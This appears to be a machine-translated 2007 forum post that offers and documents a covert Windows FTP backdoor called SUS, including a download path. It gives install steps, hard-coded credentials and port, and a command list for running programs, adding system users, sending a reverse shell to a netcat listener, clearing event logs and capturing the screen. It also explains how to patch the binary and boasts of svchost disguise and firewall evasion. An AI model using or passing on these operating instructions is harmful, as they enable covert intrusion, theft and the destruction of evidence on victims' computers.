SUS mini FTP Backdoor

This backdoor is absolutely novel, and is integrated into a small FTP server. it can quickly transfer a large number of reliable FTP files without losing the powerful control functions of the backdoor. it not only maintains a slim body, but also has good stealth and strong stability. this backdoor does not need to use a specific client program at all times, anywhere, or under any control. Coupled with its original kill-free features, how can this problem be solved?

This is the test version. The compressed package contains a file named wmiapsrv.exe. Test method: decompress it to a directory without spaces, such as c: \ windows \ System32. run the command. Then the server is successfully installed and running.

You only need to use any FTP connection tool (including FTP and IE in Windows). Fill in the server IP address, 2100 in the port, SUS In the user name, And sus666 in the password. After confirmation, the server C: the disk is immediately displayed.

Let's see how other control functions are implemented?
Here two methods are provided:

1.
Telnet <Server IP> 2100
Enter user sus
Pass sus666
After it displays logged on, you can enter a backdoor control command, such as pslist.

2.
Run ftp.exe, enter open <Server IP> 2100, follow the prompts to enter the user name Sus, And the password sus666 will be logged in. In addition to running traditional FTP commands, you can also use quote to add backdoor control commands, such as quote pslist.

The dedicated backdoor control commands are shown as follows when you enter help.
######################################## ##############################
Thank you for using the SUS's FTP backdoor! Welcome to sus!
Author: dklkt Date: 2007.7
######################################## ##############################

Winexec <exefilepath> using this to execute an executable file.
ShellExecute <exefilepath> the same to above.
Sethomedir <ftp's homedir> set the Home Directory of FTP's. Default is c :\
Getsysinfo get some system Infomation
Pslist list the process on the System
Pskill <pid> kill a process by its PID
Viewtermport view Terminal Service's port. Default is 3389
Settermport <portnum> set the Terminal Service's port.
Installterm Install terminal service.
Cleanevent clean the System Event Logs.
Enumservice list all the services in the system.
Startservice <servciename> Start a service. Like "Net start"
Stopservice <servicename> stop a service.
Deleteservice <servicename> delete a service.
Viewservice <servicename> View the detail of a service.
Configservice <servicename> <type> change service type (Auto, demand, disable)
Reboot reboot the system.
Shutdown power off the system.
Stopbackdoor stop the FTP backdoor without uninstall it.
Sendbackshell <ip> <port> send a back using shell. Use NC listen first
Startshell <port> Start a previous shell and listen. You can telnet it.
Catchscreen <BMP filepath> catch the screen now and save it to a BMP file.
Httpdownload <filepath> Uninstall uninstall the FTP backdoor!
-------------------------------------------------
Good luck!

(I am a bit confused about English, so you can easily understand it. There are many Syntax problems ^_^)

For example, if you want to run the c: \ mm.exe program in Telnet mode, enter
Winexec c: \ mm.exe

To add a system user in ftp mode, enter
Quote ShellExecute net.exe user AAA/Add

In Telnet mode, you can enter
Sethomedir D :\

In FTP mode, the quote is added.
Quote sethomedir D :\

In addition, although this is a test version, it is not specially shelled. You can also manually change the user name and password as needed. You only need to use ultraedit and other tools to search for string modifications such as sus666. The port can also be modified. The hexadecimal value of 2100 is 834. Because it is in reverse order, you can search for the 34 08 bytes, which is about the a230 row, just change it to the appropriate one. For example, if you want to change it to 21, change it to 15 00. I hope you can use it on your own, and there is no need to spread it out. It is also better to add a shell and then use it as a backdoor.

I almost forgot. The following describes the features:
This backdoor is replaced by the System Service self-started. After the backdoor is started, it is disguised as a svchost process (similar to 100%) penetrating the firewall. It is estimated that the common auxiliary tools are not easy to find out. Here you can use the stopbackdoor command to stop the backdoor and use the uninstall command to uninstall the backdoor.

/Files/allyesno/wmiapsrv.rar